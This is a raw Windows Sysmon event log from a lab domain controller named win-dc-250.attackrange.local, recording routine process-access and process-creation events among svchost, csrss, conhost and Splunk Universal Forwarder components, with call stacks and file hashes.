13:22:16.510{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006398Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:16.510{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4588-6000-4D02-000000009A01}2976C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006397Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:16.510{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4588-6000-4D02-000000009A01}2976C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006396Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:16.511{08A6967A-4588-6000-4D02-000000009A01}2976C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006395Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:16.010{08A6967A-4587-6000-4C02-000000009A01}50682704C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006423Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:17.885{08A6967A-4589-6000-4E02-000000009A01}22844624C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006422Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:17.744{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4589-6000-4E02-000000009A01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006421Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006420Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006419Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006418Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006417Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006416Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006415Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006414Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006413Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:17.744{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006412Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:17.744{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4589-6000-4E02-000000009A01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006411Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:17.744{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-4589-6000-4E02-000000009A01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006410Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:17.745{08A6967A-4589-6000-4E02-000000009A01}2284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006437Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:18.559{08A6967A-458A-6000-4F02-000000009A01}24402992C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006436Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:18.418{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-458A-6000-4F02-000000009A01}2440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006435Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:18.418{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006434Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:18.418{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006433Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:18.418{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006432Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:18.418{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006431Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:18.418{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006430Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:18.418{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006429Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 